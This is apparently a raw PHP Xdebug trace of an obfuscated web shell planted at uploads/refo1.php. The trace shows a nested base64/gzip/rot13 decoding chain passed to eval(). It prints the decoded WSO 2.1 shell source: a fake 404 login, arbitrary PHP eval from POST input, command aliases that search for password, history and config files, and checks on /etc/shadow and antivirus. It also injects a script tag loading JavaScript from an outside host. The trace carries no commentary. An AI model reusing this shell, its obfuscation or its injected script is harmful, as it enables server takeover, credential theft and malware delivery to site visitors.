Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 01:08:07.228977] 1 0 1 0.000178 393512 1 3 0 0.000497 431192 {main} 1 /var/www/html/uploads/refo1.php 0 0 1 A /var/www/html/uploads/refo1.php 2 $UeXploiT = 'Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUHHMM8iLN64IyMnPDEkN0kQC1gA=' 1 A /var/www/html/uploads/refo1.php 3 $An0n_3xPloiTeR = '=4Ne/SscyJHBmrmewO7YAt8H/DaOncTX+VAH/4b5NX/bA5VZJ0kYh+BPB/2cZO9DwFk31Hj3ZxV8jaFlkHIiO6lC0W/4/qyHTzlULnnZTIgDW9l4FqJc4djBjN7v81wfYaOYdNw3bNYjsvTPbvKmbgXuqAx52BVsAvYOHG6mUY4EuaLrgOEmVxU7cPZVOFb/Xu76t6BdG3WmxGBkSpgNI6iIj6rnLUSdpYqlCYO5dkbO7Ez7J6OyqdOPrbRCuaeUwFzvbfIr3b+HL8HStvik7MY1DmSRv7SRvzC7Dvfk6dW/I3r8hl0FvKTQlw1ic7SPyQpLySuLy3dtg1PtMq+KwnJ5Ql0RkcDjaA0GNLtZTsQczPDFCTDv504L+IX2UurFMKUyQhsybkeiV+ry3aQcL1wVVcQnIaXjmm7tR4xexrXVLKOybMLKHBjz4SIMlsaQiqYZIDmknyCVQWWl1Rs6qoUgg5jtn8XJaL+aV1tRGZ1M9oo69G4E8MtDzYFL3G/I' 2 4 0 0.000580 431192 base64_decode 0 /var/www/html/uploads/refo1.php 4 1 'Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUHHMM8iLN64IyMnPDEkN0kQC1gA=' 2 4 1 0.000600 431384 2 4 R 'K-KP+,/WK/0KK\f5ҫ2r\022KRҼ܂b\b\'%\026ħ&秤j\000,J-Pq3ȋ7\b\fI\rD\002\000' 2 5 0 0.000636 431352 gzinflate 0 /var/www/html/uploads/refo1.php 4 1 'K-KP+,/WK/0KK\f5ҫ2r\022KRҼ܂b\b\'%\026ħ&秤j\000,J-Pq3ȋ7\b\fI\rD\002\000' 2 5 1 0.000663 431608 2 5 R 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));' 2 6 0 0.000684 431416 htmlspecialchars_decode 0 /var/www/html/uploads/refo1.php 4 1 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));' 2 6 1 0.000704 431704 2 6 R 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));' 2 7 0 0.000738 434576 eval 1 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));' /var/www/html/uploads/refo1.php 4 0 3 8 0 0.000757 434576 strrev 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '=4Ne/SscyJHBmrmewO7YAt8H/DaOncTX+VAH/4b5NX/bA5VZJ0kYh+BPB/2cZO9DwFk31Hj3ZxV8jaFlkHIiO6lC0W/4/qyHTzlULnnZTIgDW9l4FqJc4djBjN7v81wfYaOYdNw3bNYjsvTPbvKmbgXuqAx52BVsAvYOHG6mUY4EuaLrgOEmVxU7cPZVOFb/Xu76t6BdG3WmxGBkSpgNI6iIj6rnLUSdpYqlCYO5dkbO7Ez7J6OyqdOPrbRCuaeUwFzvbfIr3b+HL8HStvik7MY1DmSRv7SRvzC7Dvfk6dW/I3r8hl0FvKTQlw1ic7SPyQpLySuLy3dtg1PtMq+KwnJ5Ql0RkcDjaA0GNLtZTsQczPDFCTDv504L+IX2UurFMKUyQhsybkeiV+ry3aQcL1wVVcQnIaXjmm7tR4xexrXVLKOybMLKHBjz4SIMlsaQiqYZIDmknyCVQWWl1Rs6qoUgg5jtn8XJaL+aV1tRGZ1M9oo69G4E8MtDzYFL3G/I' 3 8 1 0.000804 463280 3 8 R 'eJwBxkg5twHBSD63eJwBtkhJtwGxSE63eJwBpkhZtwGhSF63eJwBlkhpt+29f3fTurIw/P9d634H4927nWzSNEkLG9ompZSmpUB/t1Aob07sbTtNi2M7ianD4bu/MyPZlm3ZSYG9z13P84RFE1uj0WgkjUaj0Whzy5ga//1fS19ulbay1Oue7r4+3f2kXezt7fQuXnb3tM8bkDpMp3aPdy939nrbhx9PWboV2H5bBSRqXQVgFd+5U9+9b4+D0O9NfLvn6n3b79tWRZ3atmGtr6xYxt3Uce9980u979srlnPj14GYrYEZtgnj74HX/vNZq/ln89mfrWfP/1x79nTteWv12Z9rahVKCMYVVojSbivN6rf//q/v//1ffmj58EuBz5KLmPBPL+gHdgXz4Ht6Y/m2btgVgqkpx/u7Vy+hRvBV+2X0ycuKito93dvf3d7bPdzunp3u1mxz4EeZOOsor3/ruywnprL0TMWVb1HCd/Yl8IAe3amubgZj05n5imXf' 3 9 0 0.000847 463248 base64_decode 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'eJwBxkg5twHBSD63eJwBtkhJtwGxSE63eJwBpkhZtwGhSF63eJwBlkhpt+29f3fTurIw/P9d634H4927nWzSNEkLG9ompZSmpUB/t1Aob07sbTtNi2M7ianD4bu/MyPZlm3ZSYG9z13P84RFE1uj0WgkjUaj0Whzy5ga//1fS19ulbay1Oue7r4+3f2kXezt7fQuXnb3tM8bkDpMp3aPdy939nrbhx9PWboV2H5bBSRqXQVgFd+5U9+9b4+D0O9NfLvn6n3b79tWRZ3atmGtr6xYxt3Uce9980u979srlnPj14GYrYEZtgnj74HX/vNZq/ln89mfrWfP/1x79nTteWv12Z9rahVKCMYVVojSbivN6rf//q/v//1ffmj58EuBz5KLmPBPL+gHdgXz4Ht6Y/m2btgVgqkpx/u7Vy+hRvBV+2X0ycuKito93dvf3d7bPdzunp3u1mxz4EeZOOsor3/ruywnprL0TMWVb1HCd/Yl8IAe3amubgZj05n5imXf' 3 9 1 0.000946 491952 3 9 R 'x\001H9\001H>x\001HI\001HNx\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030' 3 10 0 0.001336 463248 gzuncompress 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'x\001H9\001H>x\001HI\001HNx\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030' 3 10 1 0.001727 483760 3 10 R '\001H>x\001HI\001HNx\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}t' 3 11 0 0.002106 455056 gzinflate 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '\001H>x\001HI\001HNx\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}t' 3 11 1 0.002483 475568 3 11 R 'x\001HI\001HNx\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m' 3 12 0 0.002862 455056 gzuncompress 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'x\001HI\001HNx\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m' 3 12 1 0.003315 475568 3 12 R '\001HNx\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037' 3 13 0 0.003695 455056 gzinflate 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '\001HNx\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037' 3 13 1 0.004078 475568 3 13 R 'x\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037\037' 3 14 0 0.004462 455056 gzuncompress 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'x\001HY\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037\037' 3 14 1 0.004858 475568 3 14 R '\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037\037|\\6\02' 3 15 0 0.005234 455056 gzinflate 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '\001H^x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037\037|\\6\02' 3 15 1 0.005609 475568 3 15 R 'x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037\037|\\6\023\025' 3 16 0 0.005986 455056 gzuncompress 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'x\001HiwӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037\037|\\6\023\025' 3 16 1 0.006367 475568 3 16 R 'wӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037\037|\\6\023\025\016\031u' 3 17 0 0.006745 455056 gzinflate 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 'wӺ0]~\aݻl4I\v\033&@P(oNm;Mc;ỿ3#ٖmI]E\023[h$Fhs˘\032_K_n>].^v\033:Lvw/wzۇ\037OY\025~[\005$j]\005`\025߹S߽oM|}VEڶaXq}K+sׁ\031\tYgٟg\\{tykٟkj\025J\b\025Vn+_~hKϒO/\av\005{zcn\025)W/FUeˊ==lsG8(,\'LŕoQw%\036ݩn\006cәe߅~[dj+\re\030xt)B^l:FL\0315R\030MK껃m}tw\030m߇^\037\037|\\6\023\025\016\031u' 3 17 1 0.007399 532912 3 17 R '";\r\n }\r\n\r\n}\r\n$linr = "ZWNobyAiPFNDUklQVCBTUkM9aHR0cDovL2luam";\r\n$winr = "VjdDByLmNvbS91cGRhdGUuanM+PC9TQ1JJUFQ+Ijs=";\r\n$min = \'base\' . (128 / 2) . \'_de\' . \'code\';\r\neval($min($linr . $winr));\r\n\r\n\r\n\r\necho "";\r\necho "";\r\necho "";\r\n\r\n\r\n/* WSO 2.1 (Web Shell by pgems.in) */ \r\n$auth_pass = "e48e13207341b6bffb7fb1622282247b"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n header(\'HTTP/1.0 404 Not Found\'); \r\n exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_execution_time\',0); \r\n@set_time_limit(0); \r\n@set_magic_quotes_runtime(0); \r\n@define(\'VERSION\', \'2.1\'); \r\nif( get_magic_quotes_gpc() ) { \r\n function stripslashes_array($array) { \r\n return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array); \r\n } \r\n $_POST = stripslashes_array($_POST); \r\n} \r\nfunction printLogin() { \r\n ?> \r\n

Not Found

\r\n

The requested URL was not found on this server.

\r\n
\r\n
Apache Server at Port 80
\r\n \r\n
\r\n
\r\n \r\n
\r\n "dir", \r\n "Find index.php in current dir" => "dir /s /w /b index.php", \r\n "Find *config*.php in current dir" => "dir /s /w /b *config*.php", \r\n "Show active connections" => "netstat -an", \r\n "Show running services" => "net start", \r\n "User accounts" => "net user", \r\n "Show computers" => "net view", \r\n "ARP Table" => "arp -a", \r\n "IP Configuration" => "ipconfig /all" \r\n ); \r\nelse \r\n $aliases = array( \r\n "List dir" => "ls -la", \r\n "list file attributes on a Linux second extended file system" => "lsattr -va", \r\n "show opened ports" => "netstat -an | grep -i listen", \r\n "Find" => "", \r\n "find all suid files" => "find / -type f -perm -04000 -ls", \r\n "find suid files in current dir" => "find . -type f -perm -04000 -ls",\r\n "find all sgid files" => "find / -type f -perm -02000 -ls", \r\n "find sgid files in current dir" => "find . -type f -perm -02000 -ls",\r\n "find config.inc.php files" => "find / -type f -name config.inc.php", \r\n "find config* files" => "find / -type f -name \\"config*\\"", \r\n "find config* files in current dir" => "find . -type f -name \\"config*\\"", \r\n "find all writable folders and files" => "find / -perm -2 -ls", \r\n "find all writable folders and files in current dir" => "find . -perm -2 -ls", \r\n "find all service.pwd files" => "find / -type f -name service.pwd", \r\n "find service.pwd files in current dir" => "find . -type f -name service.pwd", \r\n "find all .htpasswd files" => "find / -type f -name .htpasswd", \r\n "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", \r\n "find all .bash_history files" => "find / -type f -name .bash_history", \r\n "find .bash_history files in current dir" => "find . -type f -name .bash_history", \r\n "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", \r\n "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", \r\n "Locate" => "", \r\n "locate httpd.conf files" => "locate httpd.conf", \r\n "locate vhosts.conf files" => "locate vhosts.conf", \r\n "locate proftpd.conf files" => "locate proftpd.conf", \r\n "locate psybnc.conf files" => "locate psybnc.conf", \r\n "locate my.conf files" => "locate my.conf", \r\n "locate admin.php files" =>"locate admin.php", \r\n "locate cfg.php files" => "locate cfg.php", \r\n "locate conf.php files" => "locate conf.php", \r\n "locate config.dat files" => "locate config.dat", \r\n "locate config.php files" => "locate config.php", \r\n "locate config.inc files" => "locate config.inc", \r\n "locate config.inc.php" => "locate config.inc.php", \r\n "locate config.default.php files" => "locate config.default.php", \r\n "locate config* files " => "locate config", \r\n "locate .conf files"=>"locate \'.conf\'", \r\n "locate .pwd files" => "locate \'.pwd\'", \r\n "locate .sql files" => "locate \'.sql\'", \r\n "locate .htpasswd files" => "locate \'.htpasswd\'", \r\n "locate .bash_history files" => "locate \'.bash_history\'", \r\n "locate .mysql_history files" => "locate \'.mysql_history\'", \r\n "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", \r\n "locate backup files" => "locate backup", \r\n "locate dump files" => "locate dump", \r\n "locate priv files" => "locate priv" \r\n ); \r\n\r\nfunction printHeader() { \r\n if(empty($_POST[\'charset\'])) \r\n $_POST[\'charset\'] = "UTF-8"; \r\n global $color; \r\n ?> \r\n\'><?=$_SERVER[\'HTTP_HOST\']?>- 404 Not Found Shell V.<?=VERSION?> \r\n \r\n \r\n
\r\n
\r\n\'> \r\n\'> \r\n\'> \r\n\'> \r\n\'> \r\n\'> \r\n
\r\n".$path[$i]."/"; \r\n } \r\n $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\'); \r\n $opt_charsets = \'\'; \r\n foreach($charsets as $item) \r\n $opt_charsets .= \'\'; \r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\'); \r\n if(!empty($GLOBALS[\'auth_pass\'])) \r\n $m[\'Logout\'] = \'Logout\'; \r\n $m[\'Self remove\'] = \'SelfRemove\'; \r\n $menu = \'\'; \r\n foreach($m as $k => $v) \r\n $menu .= \'[ \'.$k.\' ]\'; \r\n $drives = ""; \r\n if ($GLOBALS[\'os\'] == \'win\') { \r\n foreach( range(\'a\',\'z\') as $drive ) \r\n if (is_dir($drive.\':\\\\\')) \r\n $drives .= \'[ \'.$drive.\' ] \'; \r\n } \r\n echo \'\'. \r\n \'\'. \r\n \'
Uname
User
Php
Hdd
Cwd\'.($GLOBALS[\'os\'] == \'win\'?\'
Drives\':\'\').\'		:\'.substr(@php_uname(), 0, 120).\' [Google] [milw0rm]
:\'.$uid.\' ( \'.$user.\' ) Group: \'.$gid.\' ( \'.$group.\' )
:\'.@phpversion().\' Safe mode: \'.($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\').\' [ phpinfo ] Datetime: \'.date(\'Y-m-d H:i:s\').\'
:\'.viewSize($totalSpace).\' Free: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)
:\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' [ home ]
:\'.$drives.\'
Server IP:
\'.gethostbyname($_SERVER["HTTP_HOST"]).\'
Client IP:
\'.$_SERVER[\'REMOTE_ADDR\'].\'
\'. \r\n \'\'.$menu.\'
\'; \r\n} \r\n\r\nfunction printFooter() { \r\n $is_writable = is_writable($GLOBALS[\'cwd\'])?"[ Writeable ]":"[ Not writable ]"; \r\n?> \r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
Change dir:
Read file:
Make dir:
Make file:
Execute:
\r\n \r\n \'> \r\n \r\n \'> \r\n Upload file:
\r\n
\r\n \r\n= 1073741824) \r\n return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\'; \r\n elseif($s >= 1048576) \r\n return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\'; \r\n elseif($s >= 1024) \r\n return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\'; \r\n else \r\n return $s . \' B\'; \r\n} \r\n\r\nfunction perms($p) { \r\n if (($p & 0xC000) == 0xC000)$i = \'s\'; \r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\'; \r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\'; \r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\'; \r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\'; \r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\'; \r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\'; \r\n else $i = \'u\'; \r\n $i .= (($p & 0x0100) ? \'r\' : \'-\'); \r\n $i .= (($p & 0x0080) ? \'w\' : \'-\'); \r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\')); \r\n $i .= (($p & 0x0020) ? \'r\' : \'-\'); \r\n $i .= (($p & 0x0010) ? \'w\' : \'-\'); \r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\')); \r\n $i .= (($p & 0x0004) ? \'r\' : \'-\'); \r\n $i .= (($p & 0x0002) ? \'w\' : \'-\'); \r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\')); \r\n return $i; \r\n} \r\nfunction viewPermsColor($f) { \r\n if (!@is_readable($f)) \r\n return \'\'.perms(@fileperms($f)).\'\'; \r\n elseif (!@is_writable($f)) \r\n return \'\'.perms(@fileperms($f)).\'\'; \r\n else \r\n return \'\'.perms(@fileperms($f)).\'\'; \r\n} \r\nif(!function_exists("scandir")) { \r\n function scandir($dir) { \r\n $dh = opendir($dir); \r\n while (false !== ($filename = readdir($dh))) { \r\n $files[] = $filename; \r\n } \r\n return $files; \r\n } \r\n} \r\nfunction which($p) { \r\n $path = ex(\'which \'.$p); \r\n if(!empty($path)) \r\n return $path; \r\n return false; \r\n} \r\nfunction actionSecInfo() { \r\n printHeader(); \r\n echo \'

Server security information

\'; \r\n function showSecParam($n, $v) { \r\n $v = trim($v); \r\n if($v) { \r\n echo \'\'.$n.\': \'; \r\n if(strpos($v, "\\n") === false) \r\n echo $v.\'
\'; \r\n else \r\n echo \'
\'.$v.\'
\'; \r\n } \r\n } \r\n \r\n showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\')); \r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\'); \r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\')); \r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\')); \r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\')); \r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\'); \r\n $temp=array(); \r\n if(function_exists(\'mysql_get_client_info\')) \r\n $temp[] = "MySql (".mysql_get_client_info().")"; \r\n if(function_exists(\'mssql_connect\')) \r\n $temp[] = "MSSQL"; \r\n if(function_exists(\'pg_connect\')) \r\n $temp[] = "PostgreSQL"; \r\n if(function_exists(\'oci_connect\')) \r\n $temp[] = "Oracle"; \r\n showSecParam(\'Supported databases\', implode(\', \', $temp)); \r\n echo \'
\'; \r\n \r\n if( $GLOBALS[\'os\'] == \'nix\' ) { \r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\'); \r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\'); \r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\'); \r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes [view]":\'no\'); \r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes [view]":\'no\'); \r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\')); \r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\')); \r\n if(!$GLOBALS[\'safe_mode\']) { \r\n echo \'
\'; \r\n $temp=array(); \r\n foreach ($userful as $item) \r\n if(which($item)){$temp[]=$item;} \r\n showSecParam(\'Userful\', implode(\', \',$temp)); \r\n $temp=array(); \r\n foreach ($danger as $item) \r\n if(which($item)){$temp[]=$item;} \r\n showSecParam(\'Danger\', implode(\', \',$temp)); \r\n $temp=array(); \r\n foreach ($downloaders as $item) \r\n if(which($item)){$temp[]=$item;} \r\n showSecParam(\'Downloaders\', implode(\', \',$temp)); \r\n echo \'
\'; \r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\')); \r\n showSecParam(\'HDD space\', ex(\'df -h\')); \r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\')); \r\n } \r\n } else { \r\n showSecParam(\'OS Version\',ex(\'ver\')); \r\n showSecParam(\'Account Settings\',ex(\'net accounts\')); \r\n showSecParam(\'User Accounts\',ex(\'net user\')); \r\n } \r\n echo \'
\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionPhp() { \r\n if( isset($_POST[\'ajax\']) ) { \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true; \r\n ob_start(); \r\n eval($_POST[\'p1\']); \r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n"; \r\n echo strlen($temp), "\\n", $temp; \r\n exit; \r\n } \r\n printHeader(); \r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { \r\n echo \'

PHP info

